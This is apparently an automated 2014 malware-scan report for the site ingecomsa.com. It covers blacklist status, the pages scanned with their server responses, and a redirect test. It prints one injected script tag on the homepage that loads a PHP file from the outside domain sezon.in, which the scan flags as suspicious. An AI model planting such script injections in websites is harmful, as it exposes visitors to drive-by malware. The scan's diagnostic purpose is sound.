Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ingecomsa.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ingecomsa.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ingecomsa.com/ | 200 OK Content-Length: 2051 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://sezon.in/prpx34vy.php?id=14140444"></script> | ||
http://sezon.in/prpx34vy.php?id=14140451 | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:45 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22c5d8f45ead01f17e9cf17f78e099faf6%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022025%22%3B%7D58802a7020cf737b7f5dff67615d6379; expires=Thu, 18-Sep-2014 08:33:45 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/ | 200 OK Content-Length: 300525 Content-Type: text/html | clean |
http://sezon.in/js/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://sezon.in/js/chosen.jquery.js | 200 OK Content-Length: 38563 Content-Type: application/x-javascript | clean |
http://sezon.in/js/jquery.js | 200 OK Content-Length: 120763 Content-Type: application/x-javascript | clean |
http://sezon.in//api-maps.yandex.ru/2.0/?load=package.full&mode=debug&lang=ru-RU/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 06:33:49 GMT Location: http://sezon.in/api-maps.yandex.ru/2.0?load=package.full&mode=debug&lang=ru-RU/ Server: nginx/1.6.1 Content-Length: 355 Content-Type: text/html; charset=iso-8859-1 | clean |
http://sezon.in/api-maps.yandex.ru/2.0?load=package.full&mode=debug&lang=ru-ru/ | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:49 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%222bab3dbd6fce478384655e974919d5a2%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022029%22%3B%7D8af8e1f04b67c55bb4378d4aa9c5258d; expires=Thu, 18-Sep-2014 08:33:49 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/test404page.js | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:50 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bcaa00fcf43fc971249a6a56c3cdc706%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022030%22%3B%7D7e0ff90f49bcb83dadddb675aae6cf7b; expires=Thu, 18-Sep-2014 08:33:50 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/js/system_central.js | 200 OK Content-Length: 73 Content-Type: application/x-javascript | clean |
http://sezon.in/dontload/jqtransformplugin/jquery.jqtransform.js | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:50 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a5cc6dbb0445b88a6f6fe00cd8a44d25%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022030%22%3B%7Dc264c766db5cfd97c7379f4c924b08ec; expires=Thu, 18-Sep-2014 08:33:50 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/js/logic.js | 200 OK Content-Length: 1959 Content-Type: application/x-javascript | clean |
http://sezon.in/js/jquery.lightbox.js | 200 OK Content-Length: 20096 Content-Type: application/x-javascript | clean |
http://sezon.in/js/iepngfix_bgr.js | 200 OK Content-Length: 4275 Content-Type: application/x-javascript | clean |
http://sezon.in/js/jquery.jscrollpane.min.js | 200 OK Content-Length: 14114 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ingecomsa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Sep 2014 06:23:28 GMT
Pragma: no-cache
Server: Apache
Content-Language: fr
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1ksd2btlu5n229lbtab5fqhuj6; path=/
X-Powered-By: PHP/5.2.6-1+lenny9
GET / HTTP/1.1
Host: ingecomsa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Sep 2014 06:23:28 GMT
Pragma: no-cache
Server: Apache
Content-Language: fr
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1ksd2btlu5n229lbtab5fqhuj6; path=/
X-Powered-By: PHP/5.2.6-1+lenny9
Second query (visit from search engine):
GET / HTTP/1.1
Host: ingecomsa.com
Referer: http://www.google.com/search?q=ingecomsa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ingecomsa.com
Referer: http://www.google.com/search?q=ingecomsa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.